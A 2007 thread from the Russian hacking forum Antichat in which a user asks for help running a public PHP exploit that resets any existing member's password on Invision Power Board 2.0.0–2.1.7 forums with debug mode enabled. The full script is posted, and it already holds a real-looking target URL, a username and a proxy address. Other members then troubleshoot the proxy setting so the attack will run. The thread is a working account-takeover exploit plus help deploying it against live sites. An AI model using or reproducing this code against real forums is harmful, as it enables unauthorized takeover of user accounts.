ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

(Debug) Remote Password Change Exploit
  #1  
Старый 10.12.2007, 22:24
_-Mitiay-_
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313

Репутация: 3
По умолчанию (Debug) Remote Password Change Exploit

пишет
PHP Notice: Underined variable: proxy in C:\1.php on line 38
PHP Notice: Underined variable: proxy in C:\1.php on line 50
Error: Probably not vulnerable, or no forum found
Прокси работает 100%
Что делать?
 
Ответить с цитированием

  #2  
Старый 10.12.2007, 22:26
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

код вайла 1.php выложить для начала
 
Ответить с цитированием

  #3  
Старый 10.12.2007, 22:27
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

да, кста, на нотифики не обращай внимания, а вот строчка

Error: Probably not vulnerable, or no forum found

говорит.... сам переведи кароч а то неинтересно даже...
 
Ответить с цитированием

  #4  
Старый 10.12.2007, 22:29
_-Mitiay-_
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313

Репутация: 3
По умолчанию

Цитата:
<?php
/*

Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator

This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site = "http://idc.user.kz/index.php";

// An existing user's login name
$name = "Mitiay";

// The new password(3-32 characters)
$pass = "123456";

// You can use a proxy...
// $proxy = "24.76.187.29:41679";



// -----------------------------
$site .= "";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid }&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={ $vid}&regid={$regid}&reg_code={$regcode}&pass1={$p ass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
вот
 
Ответить с цитированием

  #5  
Старый 10.12.2007, 22:32
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

раскоменнтируй строку // $proxy = "24.76.187.29:41679";
 
Ответить с цитированием

  #6  
Старый 10.12.2007, 22:34
_-Mitiay-_
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313

Репутация: 3
По умолчанию

Прокся
а надо Socks или http ?
 
Ответить с цитированием

  #7  
Старый 10.12.2007, 22:35
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

// $proxy = "24.76.187.29:41679";
замени на
$proxy = "24.76.187.29:41679";


Надо http
 
Ответить с цитированием

  #8  
Старый 10.12.2007, 22:40
_-Mitiay-_
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313

Репутация: 3
По умолчанию

теперь тока Error: Probably not vulnerable, or no forum found
Я где то видел что он не пашет на таких доменнах xxx.xxx.ru и то что тока на таких
xxx.ru/forum/
Это правда?
 
Ответить с цитированием

  #9  
Старый 10.12.2007, 22:44
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

http://idc.user.kz не грузится вообще.
Не знаю.
 
Ответить с цитированием

  #10  
Старый 10.12.2007, 22:50
_-Mitiay-_
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313

Репутация: 3
По умолчанию

Пробывал на другом форуме всеровно Error: Probably not vulnerable, or no forum found
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Форумы 4 10.06.2008 20:18
Нужны шаблоны на vBulletin madnet PHP, PERL, MySQL, JavaScript 3 10.12.2007 18:53
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45
Сидит ли тут backdoor? Buf АнтиАдмин 6 17.08.2004 06:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ